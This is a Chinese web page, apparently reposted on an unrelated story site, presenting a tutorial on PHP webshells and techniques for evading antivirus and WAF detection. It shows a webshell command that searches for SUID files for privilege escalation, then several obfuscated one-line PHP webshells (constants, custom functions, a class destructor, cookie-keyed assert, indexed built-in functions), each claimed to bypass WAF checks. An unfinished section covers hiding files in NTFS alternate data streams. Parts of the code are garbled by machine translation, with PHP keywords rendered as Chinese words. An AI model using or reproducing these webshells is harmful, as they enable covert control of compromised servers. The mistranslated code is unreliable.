欢迎来真孝善网,为您提供真孝善正能量书籍故事!

深入解析:网络攻击工具Webshell及其免杀技术揭秘

时间:11-24 现代故事 提交错误

下面介绍一下使用SUID提权的方法

1、使用以下命令查找本机有SUID权限的文件

test.php?cmd=system( "find/-user root -perm -4000 -print 2/dev/null");

SUID权限查找功能使用流程

免杀

目前的安全产品都是采用正则匹配的方式进行木马查杀。因此,我们要想免杀,首先要知道安全防护软件搭配什么。

eval是一个危险的函数,但它并不是一个简单的知识匹配eval。通过测试,发现tamcun的eval不会被过滤,实际过滤的内容是

image.png

免杀-常量定义

?php Define("a","$_REQUEST[cmd]");eval(a);上面的代码通过定义一个常量将eval 与(美元符号+短下划线)REQUEST 结合起来。分裂

测试此代码可以绕过WAF检查

同时执行过程中a会被$_REQUEST[cmd]替换。

能够完成Webshell的功能

免杀-定义函数

?php

函数a($a)

{

返回$a;

}

eval(a($_REQUEST)["cmd"]);

?上面的代码通过定义一个函数来拆分eval和(美元符号)+_REQUEST

检测此代码可以绕过WAF检查

通过自定义函数输出(美元符号)+ _REQUEST,并将eval 与(美元符号)+ _REQUEST 分开

免杀-定义类

?php

用户类

{

公共$名称="";

函数_destruct()

{

eval("$这个名字");

}

}

?析构类时会调用_destruct()方法,该方法的作用是调用eval来执行name中的内容。 name被赋值为值(美元符号)+_REQUEST["cmd"],表示该类在销毁时被调用了eval($_REQUEST["cmd"])

上面的代码通过定义类的magic 方法将eval 与(美元符号) + _REQUEST 拆分

检测此代码可以绕过WAF检查

免杀-多方式传参

?php

$COOKIE=$_COOKIE;

foreach($COOKIE 为$key=$value)

{

if($key=="断言")

{

$key($_REQUEST["cmd"]) ;

}

}

上面的代码需要结合向脚本传递参数才能够使用Webshell出租,这是一种比较强的绕过方法。

免杀-特殊调用

使用特殊的调用方法来断言函数

?php

$a=get_define_functions();

$a["内部"][841]($_REQUEST["cmd"]);

经测试,该方法可以绕过WAF检查。

具体原因:

image.png

隐藏Webshell

NTFS交换数据流

1.它是NTFS磁盘的一个特性

2.主流文档和非主流文档有区别

3、主文件流直接可见;非主文件流托管在主文件流中,无法直接读取。这个非主文件流就是NTFS交换数据流。

4.格式

用户评论

还未走i

真的了解webshell吗?平时怎么用的比较多?

    有6位网友表示赞同!

泡泡龙

什么网站会用到webshell啊?给我一些例子吧

    有8位网友表示赞同!

荒野情趣

免杀技术太厉害了吧!现在哪个工具比较好?

    有12位网友表示赞同!

陌然淺笑

学ウェブシェル应该怎么做?我听说有点难?

    有5位网友表示赞同!

沐晴つ

有不会被检测到的webshell吗?

    有8位网友表示赞同!

别留遗憾

免杀真的有效吗?会不会被安全人员发现啊?

    有14位网友表示赞同!

大王派我来巡山!

免杀技术是不是违法行为呢?有什么法律风险吗?

    有10位网友表示赞同!

有些人,只适合好奇~

我想学习一下webshell,从哪里可以找资料比较合适呀?

    有12位网友表示赞同!

恰十年

有没有一些 webshell 利用方法和技巧的分享啊?

    有7位网友表示赞同!

鹿叹

免杀方式有哪些分类?

    有13位网友表示赞同!

花开丶若相惜

我听说一些专业的黑客小组,他们有自己开发Webshell 和免杀手段吗?

    有8位网友表示赞同!

哥帅但不是蟋蟀

webshell的代码结构是什么样子的?有什么需要注意的地方?

    有16位网友表示赞同!

来自火星的我

最近几年安全软件变得越来越厉害了,免杀变得更难了吗?

    有18位网友表示赞同!

百合的盛世恋

学习webshell要掌握哪些编程语言?

    有14位网友表示赞同!

淡抹烟熏妆丶

我想了解一下免杀技术的原理,可以让我知道它们是怎么运作的?

    有19位网友表示赞同!

颜洛殇

在使用webshell的时候有哪些安全风险需要注意呢?

    有10位网友表示赞同!

寂莫

有没有什么方法可以检测到webshell的存在?

    有10位网友表示赞同!

嘲笑!

"学习webshell"被很多人误解成坏事,其实它也是一种学习セキュリティ的一种方式吗?

    有8位网友表示赞同!

【深入解析:网络攻击工具Webshell及其免杀技术揭秘】相关文章:

1.蛤蟆讨媳妇【哈尼族民间故事】

2.米颠拜石

3.王羲之临池学书

4.清代敢于创新的“浓墨宰相”——刘墉

5.“巧取豪夺”的由来--米芾逸事

6.荒唐洁癖 惜砚如身(米芾逸事)

7.拜石为兄--米芾逸事

8.郑板桥轶事十则

9.王献之被公主抢亲后的悲惨人生

10.史上真实张三丰:在棺材中竟神奇复活